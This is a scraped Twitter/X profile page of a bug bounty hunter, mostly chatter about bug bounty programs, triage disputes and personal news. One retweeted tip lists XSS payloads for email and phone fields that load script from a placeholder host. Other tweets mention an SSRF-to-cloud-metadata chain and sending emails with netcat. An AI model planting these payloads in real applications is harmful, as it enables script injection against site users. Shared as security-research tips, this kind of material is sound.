plenum 🇹🇳

1K posts

plenum 🇹🇳 banner
plenum 🇹🇳

plenum 🇹🇳

@plenumlab

I work as a QA and part time bountyhunter. @hackerone @bugcrowd @intigriti Plenum

France Присоединился Ocak 2018
396 Подписки3.5K Подписчики
Закреплённый твит
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
I just published Identifying and Exploiting Unsafe Deserialization in Ruby XMLRPC link.medium.com/tc9mOBQlUBb
English
1
104
306
27.9K
plenum 🇹🇳 ретвитнул
Volerion
Volerion@VolerionSec·
Launching today! Volerion transforms raw CVEs into structured and instant insights #CVE #CyberSecurity #infosec
Volerion tweet media
English
2
17
40
14.6K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@NahamSec And then wonder why do I keep doing this to myself
English
0
0
0
197
Ben Sadeghipour
Ben Sadeghipour@NahamSec·
Me: I really need to relax Also me: launches into call of duty warzone
English
2
2
83
7.8K
Blaklis
Blaklis@Blaklis_·
@SopraSteriaSecu Comme je n'ai pas de moyen de vous contacter autrement; la prochaine fois, ça serait sympa de *demander* avant d'utiliser l'image de quelqu'un pour faire votre communication. C'est quand même le strict minimum, surtout quand on est une boite de sécu...
Français
3
0
27
1.1K
Joseph Thacker
Joseph Thacker@rez0__·
HUGE personal life update! 💻😊 Yesterday was my last day as a Principal AI Engineer at AppOmni. Today, I'm a full time bug bounty hunter and solo founder. - AppOmni is amazing, and I still support them fully. I was there almost 5 years! - I’m freaking pumped to do full-time bug bounty hacking! It’s fun, challenging, and something I’m really passionate about. - Solo Founder: I'm going to keep building apps (mostly AI-powered) like the hacking-plugin I released a couple weeks ago called Shift. - Podcasting: I'm the new Co-Host of the Critical Thinking Bug Bounty Podcast (@ctbbpodcast)! 🎉 - I'm going to keep blogging and posting to my email list. I’m extremely excited for this next chapter and everything it entails. Links for all the stuff above is in the first reply. Please check out the blog, email list, and discord!
Joseph Thacker tweet media
English
64
18
459
39.2K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@intigriti Ssrf -> dns rebind -> access to cloud metadata. The rest is history 😁
English
0
0
0
162
Intigriti
Intigriti@intigriti·
Happy Halloween 🎃👻 In our final week of our Cybersecurity Awareness Month competition, we want to know... 💻 What SSRF vulnerabilities have you found? 😱 And what impact could they have had if exploited? Head to our Instagram for entry details and competition rules 👇 buff.ly/40nkysd
Intigriti tweet mediaIntigriti tweet mediaIntigriti tweet mediaIntigriti tweet media
English
1
8
52
3.8K
Joseph Thacker
Joseph Thacker@rez0__·
Small announcement 😊 🎉 I've learned a crazy amount about AI tooling and AI implementation over the last 2 years, so I'm launching an AI consulting side hustle. Naturally I've got a primary strength of hacking/security, but I've been a Principal AI Engineer for the last year and have built multiple AI applications. I've already consulted several companies on the best way to build AI applications that are high quality, fast, and secure. If you're interested, reach out at the site below in the first reply or email joseph@rez0corp.com.
Joseph Thacker tweet media
English
13
9
98
15.5K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@albinowax @h4x0r_dz Using individual by name is also interesting, to be able to hide all the tracking and unnecessary cookies
English
0
0
1
210
James Kettle
James Kettle@albinowax·
@h4x0r_dz Do you want to name individual cookies to hide?
English
5
1
7
3.3K
H4x0r.DZ 🇰🇵
H4x0r.DZ 🇰🇵@h4x0r_dz·
hey @Burp_Suite can you please add an option to customize Uninteresting headers, i want to hide the long cookies from all the requests headers too if you add this option, it will be amazing!
English
7
2
74
13.4K
godiego
godiego@_godiego__·
So funny how sometimes you can clearly see something is chatgpt written 😂
English
5
0
17
3.7K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@Jhaddix @DanaEpp @rez0__ @Shopify @G0LDEN_infosec Agreed, regardless of the program, things have been piling up for quite some time now, and we have seen this behavior becoming more common. Some reports have been disclosed already where we clearly see triage or vendor giving wrong cvss explanation sometimes totally made up.
English
0
0
1
358
JS0N Haddix
JS0N Haddix@Jhaddix·
its not my bug, and they closed comms with @G0LDEN_infosec even after appeal. How is he supposed to have a convo in private? There's no recourse for him. He happened to mention his frustration in discord. There was a thread in another discord talking about the program in a negative way. So I tweeted. But if i handn't there no options left for him. THEN people came out from everywhere. That's not on me. You are saying i should have back-channled with people i know at the program. I'm saying that bug hunter's shouldnt need a profile like mine to get some help.
English
2
3
21
4.5K
JS0N Haddix
JS0N Haddix@Jhaddix·
Well, this is kind of going bug bounty viral... MULTIPLE DMs on Discord from LEGIT researchers showing me bugs downgraded. Or BS reasons for invalidating. Yikes
JS0N Haddix@Jhaddix

Hey @Shopify @Hacker0x01 ... I have had two bug hunters come to me and tell me horror stories about your bug bounty lately. Valid bugs being exploited and you coming out saying... "oh we had planned on fixing that... no impact" That is NOT the bug bounty contract. If there is a PoC showing the bug was exploitable at ANY time, you should pay the researcher. Don't contribute to a bug bounty community that makes researchers think bug bounty is a scam. Also - dont hide behind the new CVSS. Program owners looking to downgrade bugs to save money using the new CVSS and splitting bugs are SUPER scummy. Contact @G0LDEN_infosec

English
11
14
161
25.7K
Joseph Thacker
Joseph Thacker@rez0__·
You’re routing a bastion. I’m routing the most efficient path to clean up my kids’ toys all over the yard. We are not the same.
English
3
0
11
2K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@zseano Glad it went good, hope you get well soon buddy
English
0
0
0
116
zseano
zseano@zseano·
Home sweet home 🙌 very tired & sore! Told me it was severely infected & they were worried it would pop inside me & run risk of sepsis, so I had “emergency surgery”. now the healing begins 🙏 ready for bed 😴😂
English
12
0
45
3.5K
zseano
zseano@zseano·
Been in hospital since yesterday waiting for surgery on an infected abscess to be removed, getting quite fed up now! so damn hungry. Wish I brought my laptop to do some hacking😴
English
39
2
138
11.5K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
@ctbbpodcast @domain Fun fact you can actually exploit it the other way around, if the app allows incoming emails and uses/shows the sender field, you can send emails with netcat, although it is tricky to not break SMTP syntax it is still a nice bug medium.com/bugbountywrite…
English
1
2
19
738
Critical Thinking - Bug Bounty Podcast
RFC-compliant payloads to try and put in your username or telephone number fields on your next target: Email: "><img/src/onerror=import('//domain/')>"@domain.com Mobile: 013371337;ext=<img/src/onerror=import('//domain/')>
English
2
42
243
12.8K
godiego
godiego@_godiego__·
Today, on how to scam hackers, unauthenticated mass PII leak rated Medium cause the data cannot be used to compromise a system 🤡
English
14
0
55
9.9K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
Are you a hacker ?
plenum 🇹🇳 tweet media
English
2
2
11
1K
plenum 🇹🇳
plenum 🇹🇳@plenumlab·
I'm buying this one.
plenum 🇹🇳 tweet media
English
0
0
18
652